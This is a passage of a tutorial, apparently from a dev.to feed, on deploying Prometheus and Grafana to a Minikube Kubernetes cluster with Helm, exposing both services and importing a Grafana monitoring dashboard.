&lt;li&gt;Performance metrics.&lt;/li&gt;
&lt;li&gt;Resource allocation and utilization across server components.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In essence, Prometheus plays a pivotal role in ensuring the health and performance of a Kubernetes cluster, making it an essential tool for DevOps and system administrators.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is Grafana?
&lt;/h4&gt;

&lt;p&gt;Grafana is a versatile, open-source tool for visualizing data. When it’s connected to data sources like Prometheus, it offers features like interactive dashboards, charts, graphs, and web alerts. You can use Grafana to view and understand your data from various sources, not just Prometheus, including InfluxDB, Azure Monitor, and others.&lt;/p&gt;

&lt;p&gt;You can build your own dashboards or use pre-made ones and customize them as needed. Many DevOps professionals use Grafana and Prometheus to create powerful databases and visual displays for tracking data over time. In this guide, we’ll show you how to make a dashboard for visualizing metrics from Prometheus.&lt;/p&gt;

&lt;h4&gt;
  
  
  Choosing the Right Deployment Method for Prometheus and Grafana Integration on Kubernetes
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Manual Kubernetes Deployment:&lt;/strong&gt; In this method, you’re required to create Kubernetes Deployment and Services YAML files for both Prometheus and Grafana. These YAML files must include all the necessary configurations to enable integration with Kubernetes. Subsequently, you deploy these files to your Kubernetes cluster to make Prometheus and Grafana operational. This process may result in multiple YAML files, which can be somewhat burdensome for many DevOps professionals. Additionally, a single mistake in any YAML file can impede the integration of Prometheus and Grafana on Kubernetes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Using Helm:&lt;/strong&gt; This stands out as the simplest and most convenient method for deploying applications in containers to Kubernetes. Helm serves as the official package manager for Kubernetes and streamlines the installation, deployment, and management of Kubernetes applications. Helm packages and encapsulates the Kubernetes application within a Helm Chart. A Helm Chart encompasses all the essential YAML files, including Deployments, Services, Secrets, and ConfigMaps manifests. These files are instrumental in deploying the application container in Kubernetes. Instead of crafting individual YAML files for each application container, Helm offers the convenience of downloading pre-existing Helm charts that come equipped with the necessary manifest YAML files.&lt;/li&gt;
&lt;/ol&gt;
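To make the trade-off concrete, here is a rough sketch of what the manual route involves: a hand-written Deployment and Service for Prometheus. The names, image tag, and ports below are illustrative assumptions, not what the Helm chart actually generates.

```yaml
# Minimal, illustrative manifests for running Prometheus by hand.
# Names, image tag, and ports are assumptions for this sketch.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: prometheus
spec:
  replicas: 1
  selector:
    matchLabels:
      app: prometheus
  template:
    metadata:
      labels:
        app: prometheus
    spec:
      containers:
        - name: prometheus
          image: prom/prometheus:v2.47.0
          ports:
            - containerPort: 9090   # Prometheus web UI and API
---
apiVersion: v1
kind: Service
metadata:
  name: prometheus-server
spec:
  selector:
    app: prometheus
  ports:
    - port: 80          # service port inside the cluster
      targetPort: 9090  # container port
```

Helm bundles manifests like these (plus ConfigMaps, RBAC rules, and more) into a single chart, which is why the second method is usually preferred.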

&lt;h4&gt;
  
  
  Installing Helm
&lt;/h4&gt;

&lt;p&gt;Before you install Helm, make sure your Minikube Kubernetes cluster is running (you can start it with &lt;code&gt;minikube start&lt;/code&gt;). Then install Helm for your platform:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Installing Helm on macOS
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brew install helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Installing Helm on Linux
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt-get install helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Installing Helm on Windows
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;choco install Kubernetes-helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Helm Commands
&lt;/h4&gt;

&lt;p&gt;To get all the Helm commands, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The command output:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--x_58iR9F--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A6HfRs0R_3vookyvUI7u30Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--x_58iR9F--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A6HfRs0R_3vookyvUI7u30Q.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Helm commands&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Here are the fundamental Helm commands:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;helm search:&lt;/strong&gt; Search for Helm Charts in the ArtifactHub repository.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;helm pull:&lt;/strong&gt; Retrieve and download a Helm Chart from the ArtifactHub repository.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;helm install:&lt;/strong&gt; Upload and deploy a Helm Chart to your Kubernetes cluster.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;helm list:&lt;/strong&gt; Display a list of all deployed Helm charts within your Kubernetes cluster.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Prometheus Helm Charts
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Let’s begin by searching for the Prometheus Helm Charts. To find the official Prometheus Helm Chart, use the following command:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm search hub prometheus
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;The command lists the following Prometheus Helm Charts:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--QX5rimQO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AUUmkrAN2kXkd9dKcHDbp-A.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--QX5rimQO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AUUmkrAN2kXkd9dKcHDbp-A.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Prometheus Artifacts&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;You can also go to the &lt;a href="https://artifacthub.io/"&gt;ArtifactHub&lt;/a&gt; repository and search for the official Prometheus Helm Chart as shown in the image below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--oYtWcxwm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A35Z4cbL9lUOia2kCzFpl0A.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--oYtWcxwm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A35Z4cbL9lUOia2kCzFpl0A.png" alt="" width="800" height="379"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Artifacts site&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first one on the list is the official Prometheus Helm Chart. To get this Helm chart, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Install Prometheus Helm Chart on Kubernetes Cluster
&lt;/h4&gt;

&lt;p&gt;To install Prometheus Helm Chart on Kubernetes Cluster, run this helm install command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm install prometheus prometheus-community/prometheus
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After successfully installing Prometheus on your Kubernetes Cluster, you can access the Prometheus server via port 80. The subsequent task is to inspect the Kubernetes resources that have been deployed. These resources consist of the pods and services generated by the Helm Chart within your Kubernetes cluster.&lt;/p&gt;

&lt;p&gt;To examine the deployed Kubernetes resources, execute the following kubectl command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get all
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MuJBgHC2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgFWG1yFTKqYOYus-XjN7YA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MuJBgHC2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgFWG1yFTKqYOYus-XjN7YA.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The installation of the Helm Chart results in the creation of several essential Kubernetes resources, including:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pods:&lt;/strong&gt; These pods host the Prometheus Kubernetes application within the cluster.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replica Sets:&lt;/strong&gt; A collection of instances of the same application inside the Kubernetes cluster, enhancing application reliability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deployments:&lt;/strong&gt; These deployments serve as the blueprint for creating application pods.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Services&lt;/strong&gt; : Services are responsible for exposing the pods running within the Kubernetes cluster, allowing us to access the deployed Kubernetes application.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The subsequent action involves accessing and launching the Prometheus Kubernetes application. You can access the application through the Kubernetes services designated for Prometheus. To obtain a list of all the Kubernetes Services associated with Prometheus, execute the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--D6pWvPmd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AckTLFziUyj_v7aRrXYRaSA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--D6pWvPmd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AckTLFziUyj_v7aRrXYRaSA.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Exposing the prometheus-server Kubernetes Service
&lt;/h4&gt;

&lt;p&gt;To expose the prometheus-server Kubernetes service, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl expose service prometheus-server --type=NodePort --target-port=9090 --name=prometheus-server-external
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command changes the service type from ClusterIP to NodePort, making the prometheus-server reachable from outside the Kubernetes cluster through a node port that forwards to the container's port 9090.&lt;/p&gt;

&lt;p&gt;Now we have exposed the prometheus-server Kubernetes service. Let’s access the Prometheus application using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;minikube service prometheus-server-external
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Please be aware that it may require some time for the URL to become accessible. You might need to make multiple attempts in your web browser until you successfully access the Prometheus Kubernetes application through the provided URL. It’s important to keep the terminal open and the tunnel command running to ensure continuous access to the service.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---wiJyRr9--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AaoRkovaS347o_UgRvkwL7w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---wiJyRr9--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AaoRkovaS347o_UgRvkwL7w.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With Prometheus successfully installed on Kubernetes via Helm, Prometheus is up and running within the cluster, and it’s accessible through a browser via a URL. Moving on to the next steps in the tutorial:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;We will proceed to install Grafana.&lt;/li&gt;
&lt;li&gt;Subsequently, we’ll establish the integration between Prometheus and Grafana. Grafana will utilize Prometheus as its primary data source.&lt;/li&gt;
&lt;li&gt;Finally, we will employ Grafana to craft the dashboards essential for monitoring and observing the Kubernetes cluster.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Install Grafana
&lt;/h4&gt;

&lt;p&gt;To install, we follow the same steps as those for installing Prometheus:&lt;/p&gt;

&lt;h4&gt;
  
  
  Search for Grafana Helm Charts
&lt;/h4&gt;

&lt;p&gt;To search for the Grafana Helm charts, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm search hub grafana
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can also go to the ArtifactHub repository and search for the official Grafana Helm Chart as shown in the image below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--lYpppy3d--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9L7riVPayN3bv_nssK5tag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--lYpppy3d--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9L7riVPayN3bv_nssK5tag.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To get this Grafana Helm chart, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm repo add grafana https://grafana.github.io/helm-charts 
helm repo update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Install Grafana Helm Chart on Kubernetes Cluster
&lt;/h3&gt;

&lt;p&gt;You’ll run this helm install command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm install grafana grafana/grafana
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We have installed Grafana on the Kubernetes cluster and can access the Grafana server via port 80. The next step is to access and launch the Grafana application through its Kubernetes service. To list the Kubernetes Services for Grafana, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Exposing the grafana Kubernetes Service
&lt;/h4&gt;

&lt;p&gt;To expose the grafana Kubernetes service, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl expose service grafana --type=NodePort --target-port=3000 --name=grafana-ext
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command changes the service type from ClusterIP to NodePort, making Grafana reachable from outside the Kubernetes cluster through a node port that forwards to the container's port 3000. Now that we have exposed the grafana Kubernetes service, let's access the Grafana application using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;minikube service grafana-ext
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qh_TjR3G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ar1PImBF_DtVkHhw7dPWtSA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qh_TjR3G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ar1PImBF_DtVkHhw7dPWtSA.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The image above shows the Grafana login page. To get the password for the admin user, run this command in a new terminal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get secret --namespace default grafana -o jsonpath="{.data.admin-password}" | base64 --decode ; echo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
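The jsonpath query returns the admin password base64-encoded, and the trailing base64 --decode turns it back into plain text. The decoding step can be illustrated on its own with a made-up encoded value (not a real secret):

```shell
# A hypothetical base64-encoded password, as it would be stored in the Secret
encoded="czNjcjN0LXBhc3M="

# Decode it the same way the kubectl pipeline does; the final echo adds a newline
printf '%s' "$encoded" | base64 --decode ; echo
```

This prints s3cr3t-pass; the real command substitutes the live secret pulled from your cluster.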



&lt;h4&gt;
  
  
  Login into Grafana
&lt;/h4&gt;

&lt;p&gt;To log in to Grafana, enter admin as the username along with your generated password. This will open the Welcome to Grafana home page shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EQCSwlFk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AJ8qLnciUqcpr7KXquoUITQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EQCSwlFk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AJ8qLnciUqcpr7KXquoUITQ.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, add Prometheus as the data source. To do so, follow these steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On the Welcome to Grafana Home page, click Add your first data source:&lt;/li&gt;
&lt;li&gt;Select Prometheus as the data source:&lt;/li&gt;
&lt;li&gt;You will then add the URL where your Prometheus application is running. This is the first URL (internal to the cluster) shown when we ran minikube service prometheus-server-external earlier.&lt;/li&gt;
&lt;/ul&gt;
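Since Grafana runs inside the same cluster here, the data-source URL can also be the cluster-internal DNS name of the Prometheus service instead of the Minikube URL. Assuming the default namespace and the release name used above, it would look like this:

```
http://prometheus-server.default.svc.cluster.local
```

Port 80 is the service port, so it can be omitted from the URL.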

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KbGgrkMR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A69RFE1-74wOCYCbq6Fq7yA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KbGgrkMR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A69RFE1-74wOCYCbq6Fq7yA.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click the “Save &amp;amp; test” button to preserve your modifications.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With that, you have successfully completed the integration of Prometheus and Grafana on Kubernetes using Helm. The final phase involves crafting a Grafana Dashboard, a pivotal step in visualizing the metrics for your Kubernetes cluster.&lt;/p&gt;

&lt;h4&gt;
  
  
  Grafana Dashboard
&lt;/h4&gt;

&lt;p&gt;As previously mentioned, you can either build your own dashboards from scratch or import existing ones from the public Grafana library. In this section, we’ll walk through importing a dashboard. To import a Grafana Dashboard, follow these steps:&lt;/p&gt;

&lt;p&gt;Retrieve the Grafana Dashboard ID from the public &lt;strong&gt;Grafana Dashboard library&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://grafana.com/solutions/kubernetes/"&gt;Kubernetes Monitoring with Grafana&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On this web page, search for Kubernetes:&lt;/li&gt;
&lt;li&gt;Scroll until you find the Kubernetes cluster monitoring (via Prometheus) dashboard&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ecskhs-y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab8FpOMG1lS9S8yVUpn_YCA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ecskhs-y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab8FpOMG1lS9S8yVUpn_YCA.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Select the dashboard and copy its Dashboard ID.&lt;/li&gt;
&lt;li&gt;Go back to Grafana and click Home in the top-left corner.&lt;/li&gt;
&lt;li&gt;It will display a menu.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On the menu, click Dashboards.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click New.&lt;/li&gt;
&lt;li&gt;It will display three options: New Dashboard, New Folder, and Import.&lt;/li&gt;
&lt;li&gt;Click Import.&lt;/li&gt;
&lt;li&gt;Add the Dashboard ID: paste the ID you copied earlier (315 for this dashboard) and click Load.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ij-X-Wsd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ARmug678YpE40t9va1AAzMQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ij-X-Wsd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ARmug678YpE40t9va1AAzMQ.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It will then launch the Dashboard shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--z-LbXral--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A51KRx-pHmoCNB4Exk08U_w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--z-LbXral--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A51KRx-pHmoCNB4Exk08U_w.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iXVVU7f1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Abg-U2_ad7_46tGNvcG9jbw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iXVVU7f1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Abg-U2_ad7_46tGNvcG9jbw.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You can use this dashboard to monitor and observe your Kubernetes cluster. It displays the following metrics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network I/O pressure.&lt;/li&gt;
&lt;li&gt;Cluster CPU usage.&lt;/li&gt;
&lt;li&gt;Cluster Memory usage.&lt;/li&gt;
&lt;li&gt;Cluster filesystem usage.&lt;/li&gt;
&lt;li&gt;Pods CPU usage.&lt;/li&gt;
&lt;/ul&gt;
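&lt;p&gt;Each of these panels is driven by a PromQL query over the cAdvisor metrics Prometheus scrapes from the cluster. As a rough sketch, you can evaluate the same kind of queries yourself against Prometheus’s instant-query endpoint; the address below is a placeholder for the URL printed by minikube service prometheus-server-external earlier.&lt;/p&gt;

```shell
# Placeholder for your Prometheus address.
PROM_URL="http://192.168.49.2:30000"

# Cluster CPU usage: per-second rate of CPU time consumed by all
# containers over the last 5 minutes, summed across the cluster.
CPU_QUERY='sum(rate(container_cpu_usage_seconds_total[5m]))'

# Cluster memory usage: working-set bytes summed across all containers.
MEM_QUERY='sum(container_memory_working_set_bytes)'

# /api/v1/query evaluates a PromQL expression at the current instant.
# Ignored on failure so the sketch degrades gracefully offline.
curl -sG "${PROM_URL}/api/v1/query" --data-urlencode "query=${CPU_QUERY}" || true
curl -sG "${PROM_URL}/api/v1/query" --data-urlencode "query=${MEM_QUERY}" || true
```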

&lt;h4&gt;
  
  
  Advantages of Configuring Prometheus and Grafana for Container Orchestration Platform Monitoring
&lt;/h4&gt;

&lt;p&gt;The deployment of Prometheus and Grafana for monitoring purposes offers several notable benefits:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It delivers a comprehensive solution for monitoring and overseeing a Kubernetes cluster.&lt;/li&gt;
&lt;li&gt;You gain the capability to perform metric queries using Prometheus’s PromQL query language, facilitating in-depth analysis.&lt;/li&gt;
&lt;li&gt;In the context of a microservices architecture, Prometheus efficiently tracks all your microservices concurrently, ensuring no aspect goes unmonitored.&lt;/li&gt;
&lt;li&gt;Immediate alerts are triggered when a service encounters a failure, allowing for swift corrective actions.&lt;/li&gt;
&lt;li&gt;The Grafana dashboard provides comprehensive performance and health reports for your clusters, offering valuable insights and visual representations of your system’s state.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;p&gt;In this comprehensive guide, you’ve acquired the knowledge needed to seamlessly integrate Prometheus and Grafana into your Kubernetes environment using Helm. Furthermore, you’ve gained insights into creating a straightforward dashboard in Grafana, enabling you to monitor resource utilization and performance metrics across your Kubernetes cluster.&lt;/p&gt;

&lt;p&gt;Monitoring plays a pivotal role in DevOps, ensuring that you maintain visibility into your Kubernetes cluster and the performance of microservices. Implementing these practices is essential for real-time updates on your cluster’s health, allowing you to stay informed about its current status.&lt;/p&gt;

&lt;p&gt;That brings us to the conclusion of this Prometheus and Grafana guide. Thank you for reading, and here’s to your continued learning and success!&lt;/p&gt;

</description>
      <category>docker</category>
      <category>devops</category>
      <category>prometheus</category>
      <category>grafana</category>
    </item>
  </channel>
</rss>
